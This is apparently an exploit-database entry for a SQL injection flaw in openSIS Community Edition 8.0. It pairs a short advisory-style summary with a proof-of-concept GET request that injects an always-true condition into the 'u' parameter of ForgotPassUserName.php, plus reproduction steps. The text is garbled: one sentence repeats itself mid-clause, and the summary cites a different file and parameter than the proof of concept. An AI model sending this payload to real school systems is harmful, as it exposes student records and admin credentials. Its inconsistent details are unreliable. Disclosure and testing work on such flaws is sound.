openSIS Community Edition 8.0 SQL Injection

openSIS Community Edition 8.0 contained critical SQL Injection vulnerabilities.
These flaws openSIS Community Edition 8.0 contained critical SQL Injection vulnerabilities.
These flaws allowed attackers to manipulate database queries by injecting
malicious SQL code into various input fields. Notably, parameters like
`student_id` in `Students.php` were susceptible.

Exploitation enabled unauthorized access, data extraction (e.g., student
records, teacher details, admin credentials), and data manipulation
(e.g., altering grades). The impact was severe, leading to full data
compromise and potential administrative control over the application.

Mitigation required robust input validation and parameterized queries.
Users were urged to update to patched versions to address these critical flaws.

# Exploit Title: openSIS Community Edition 8.0 - SQL Injection
# Date: 2025-11-25
# Exploit Author: CodeSecLab
# Vendor Homepage: https://github.com/OS4ED/openSIS-Classic
# Software Link: https://github.com/OS4ED/openSIS-Classic
# Version: 8.0
# Tested on: Windows
# CVE : CVE-2021-40617


Proof Of Concept
GET /ForgotPassUserName.php?used_for=username&u=test%27%20OR%20%271%27%3D%271&user_type=student HTTP/1.1
Host: opensis
Connection: close



Steps to Reproduce
Login as an admin user.
Intercept and send the malicious request using a web proxy tool such as Burp Suite, ensure it includes a valid session cookie.
Observe the result